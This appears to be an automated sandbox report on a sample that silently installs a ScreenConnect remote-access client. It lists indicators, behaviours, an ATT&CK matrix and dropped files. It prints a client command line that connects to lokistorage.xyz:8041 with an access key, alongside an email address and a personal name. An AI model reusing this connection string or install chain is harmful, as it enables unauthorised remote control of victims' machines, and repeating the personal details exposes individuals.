                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI805D.tmpJump to dropped file
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exe TID: 2728Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe TID: 6708Thread sleep count: 223 > 30Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe TID: 2056Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                              Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: ScreenConnect.ClientService.exe, 00000008.00000002.3460563524.0000000004E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeMemory allocated: page read and write | page guardJump to behavior

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Source: 0.2.lat0Kwfbuj.exe.1350000.0.raw.unpack, Program.csReference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")
                              Source: 0.2.lat0Kwfbuj.exe.53b0000.3.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                              Source: 0.2.lat0Kwfbuj.exe.53b0000.3.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                              Source: 0.2.lat0Kwfbuj.exe.53b0000.3.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                              Source: 0.2.lat0Kwfbuj.exe.53b0000.3.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                              Source: 0.2.lat0Kwfbuj.exe.53b0000.3.raw.unpack, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi"Jump to behavior
                              Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (20ae101cef0f1acf)\screenconnect.clientservice.exe" "?e=access&y=guest&h=lokistorage.xyz&p=8041&s=8c30d271-264f-488c-94af-041784a36368&k=bgiaaackaabsu0exaagaaaeaaqchadx0vdcoypzw3rhl2%2fwsmdfp2rmcowlbz1ecggd2oi1gruiacwzcrkszxbywgdfgxdbyoegqdwtpmoqlg8jof4zkxvyt9zhvvqib5ire7%2frfo81g3%2b6hxkpjc0inqs%2bxruwq1z%2b6smxqscbb%2fykhdhw7ahbhyk65snb5ak02%2bpswsu904ncqii1vfx60s4cj8ilr9kifjwymgg0rdnakscv6gau5odsv8wz3cfurc2fznj8a0fkfb5xyik39fbiivzp4vyfarunnluqwccrm3hrkoohc9g96dlui6y4avh5vyzfnxeaixqvrlqzjtpadrhivwzf5sgoywqiok%2bc5&t=michalgasper2%40gmail.com&c=kristof%20horvat&c=&c=&c=&c=&c=&c=&c="
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2257604970.00000000004F2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.drBinary or memory string: Progman
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2257604970.00000000004F2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\ScreenConnect.InstallerActions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD340D5B35 CreateNamedPipeW,9_2_00007FFD340D5B35
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_014F4D2E RtlGetVersion,8_2_014F4D2E
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                              Lowering of HIPS / PFW / Operating System Security Settings

                              barindex
                              Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication PackagesJump to behavior
                              Source: Yara matchFile source: lat0Kwfbuj.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.2.lat0Kwfbuj.exe.5600000.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 9.0.ScreenConnect.WindowsClient.exe.4f0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 9.2.ScreenConnect.WindowsClient.exe.271fa18.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 10.2.ScreenConnect.WindowsClient.exe.301fa50.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.lat0Kwfbuj.exe.5600000.7.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.lat0Kwfbuj.exe.b9b9d4.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.lat0Kwfbuj.exe.bc518c.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.lat0Kwfbuj.exe.b163d4.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.lat0Kwfbuj.exe.b00000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000002.2222155530.0000000005600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000009.00000000.2257604970.00000000004F2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000009.00000002.3438865774.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.2207287516.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000A.00000002.2611494645.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000000.2196973260.0000000000B16000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: lat0Kwfbuj.exe PID: 5880, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 320, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 5900, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Config.Msi\48861a.rbs, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\Installer\MSI884C.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe, type: DROPPED
                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity InformationAcquire Infrastructure1
                              Valid Accounts
                              31
                              Windows Management Instrumentation
                              1
                              DLL Side-Loading
                              1
                              DLL Side-Loading
                              11
                              Disable or Modify Tools
                              OS Credential Dumping11
                              Peripheral Device Discovery
                              Remote Services11
                              Archive Collected Data
                              2
                              Encrypted Channel
                              Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomains1
                              Replication Through Removable Media
                              1
                              Native API
                              1
                              DLL Search Order Hijacking
                              1
                              DLL Search Order Hijacking
                              1
                              Deobfuscate/Decode Files or Information
                              LSASS Memory1
                              File and Directory Discovery
                              Remote Desktop ProtocolData from Removable Media1
                              Non-Standard Port
                              Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts12
                              Command and Scripting Interpreter
                              1
                              Component Object Model Hijacking
                              1
                              Component Object Model Hijacking
                              1
                              Obfuscated Files or Information
                              Security Account Manager45
                              System Information Discovery
                              SMB/Windows Admin SharesData from Network Shared Drive1
                              Non-Application Layer Protocol
                              Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCron1
                              Valid Accounts
                              1
                              Valid Accounts
                              1
                              Software Packing
                              NTDS21
                              Security Software Discovery
                              Distributed Component Object ModelInput Capture1
                              Application Layer Protocol
                              Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchd2
                              Windows Service
                              1
                              Access Token Manipulation
                              1
                              DLL Side-Loading
                              LSA Secrets2
                              Process Discovery
                              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
                              Bootkit
                              2
                              Windows Service
                              1
                              DLL Search Order Hijacking
                              Cached Domain Credentials51
                              Virtualization/Sandbox Evasion
                              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items13
                              Process Injection
                              1
                              File Deletion
                              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job122
                              Masquerading
                              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                              Valid Accounts
                              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                              Access Token Manipulation
                              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd51
                              Virtualization/Sandbox Evasion
                              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task13
                              Process Injection
                              KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                              Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                              Hidden Users
                              GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                              Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                              Bootkit
                              Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood
                              Identify Business TempoBotnetHardware AdditionsPythonHypervisorProcess Injection1
                              Rundll32
                              Credential API HookingDomain GroupsExploitation of Remote ServicesRemote Email CollectionExternal ProxyTransfer Data to Cloud AccountReflection Amplification
                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1554617 Sample: lat0Kwfbuj.exe Startdate: 12/11/2024 Architecture: WINDOWS Score: 50 55 lokistorage.xyz 2->55 61 Multi AV Scanner detection for submitted file 2->61 63 .NET source code contains potential unpacker 2->63 65 .NET source code references suspicious native API functions 2->65 69 5 other signatures 2->69 8 msiexec.exe 94 50 2->8         started        12 ScreenConnect.ClientService.exe 2 5 2->12         started        15 lat0Kwfbuj.exe 5 2->15         started        signatures3 67 Performs DNS queries to domains with low reputation 55->67 process4 dnsIp5 35 ScreenConnect.Wind...dentialProvider.dll, PE32+ 8->35 dropped 37 C:\...\ScreenConnect.WindowsClient.exe, PE32 8->37 dropped 39 C:\...\ScreenConnect.ClientService.exe, PE32 8->39 dropped 43 10 other files (1 malicious) 8->43 dropped 75 Enables network access during safeboot for specific services 8->75 77 Modifies security policies related information 8->77 17 msiexec.exe 8->17         started        19 msiexec.exe 1 8->19         started        21 msiexec.exe 8->21         started        57 lokistorage.xyz 95.164.16.15, 49723, 8041 NASSIST-ASGI Gibraltar 12->57 79 Reads the Security eventlog 12->79 81 Reads the System eventlog 12->81 23 ScreenConnect.WindowsClient.exe 3 12->23         started        26 ScreenConnect.WindowsClient.exe 2 12->26         started        41 C:\Users\user\AppData\...\lat0Kwfbuj.exe.log, ASCII 15->41 dropped 83 Contains functionality to hide user accounts 15->83 28 msiexec.exe 6 15->28         started        file6 signatures7 process8 file9 31 rundll32.exe 20 17->31         started        71 Creates files in the system32 config directory 23->71 73 Contains functionality to hide user accounts 23->73 45 C:\Users\user\AppData\Local\...\MSI805D.tmp, PE32 28->45 dropped signatures10 process11 file12 47 C:\Users\user\...\ScreenConnect.Windows.dll, PE32 31->47 dropped 49 C:\...\ScreenConnect.InstallerActions.dll, PE32 31->49 dropped 51 C:\Users\user\...\ScreenConnect.Core.dll, PE32 31->51 dropped 53 4 other files (none is malicious) 31->53 dropped 59 Contains functionality to hide user accounts 31->59 signatures13

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand
                              SourceDetectionScannerLabelLink
                              lat0Kwfbuj.exe21%ReversingLabsWin32.PUA.ConnectWise
                              SourceDetectionScannerLabelLink
                              C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsAuthenticationPackage.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsCredentialProvider.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI805D.tmp0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\Microsoft.Deployment.Compression.Cab.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\Microsoft.Deployment.Compression.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\Microsoft.Deployment.WindowsInstaller.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\ScreenConnect.Core.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\ScreenConnect.InstallerActions.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\ScreenConnect.Windows.dll0%ReversingLabs
                              C:\Windows\Installer\MSI888B.tmp0%ReversingLabs
                              C:\Windows\Installer\MSI8C55.tmp0%ReversingLabs
                              No Antivirus matches
                              No Antivirus matches
                              No Antivirus matches
                              NameIPActiveMaliciousAntivirus DetectionReputation
                              lokistorage.xyz
                              95.164.16.15
                              truetrue
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://wixtoolset.org/releases/rundll32.exe, 00000005.00000003.2221560120.0000000004ABA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2221560120.0000000004B2B000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drfalse
                                  high
                                  http://wixtoolset.org/news/rundll32.exe, 00000005.00000003.2221560120.0000000004ABA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2221560120.0000000004B2B000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drfalse
                                    high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameScreenConnect.ClientService.exe, 00000008.00000002.3441561097.00000000022A9000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2611494645.0000000003427000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/vrundll32.exe, 00000005.00000003.2221560120.0000000004ABA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2221560120.0000000004B2B000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drfalse
                                        high
                                        https://feedback.screenconnect.com/Feedback.axdScreenConnect.Core.dll.3.drfalse
                                          high
                                          https://docs.rs/getrandom#nodejs-es-module-supportScreenConnect.WindowsCredentialProvider.dll.3.drfalse
                                            high
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            95.164.16.15
                                            lokistorage.xyzGibraltar
                                            29632NASSIST-ASGItrue
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1554617
                                            Start date and time:2024-11-12 18:39:12 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 8m 18s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:15
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:lat0Kwfbuj.exe
                                            renamed because original name is a hash value
                                            Original Sample Name:723553540a5bdd7ae07408bceef12e9b4feb1b572a5c0d30c251fe2bdf4bc5bf.exe
                                            Detection:MAL
                                            Classification:mal50.troj.evad.winEXE@17/64@1/1
                                            EGA Information:
                                            • Successful, ratio: 60%
                                            HCA Information:
                                            • Successful, ratio: 82%
                                            • Number of executed functions: 324
                                            • Number of non-executed functions: 2
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
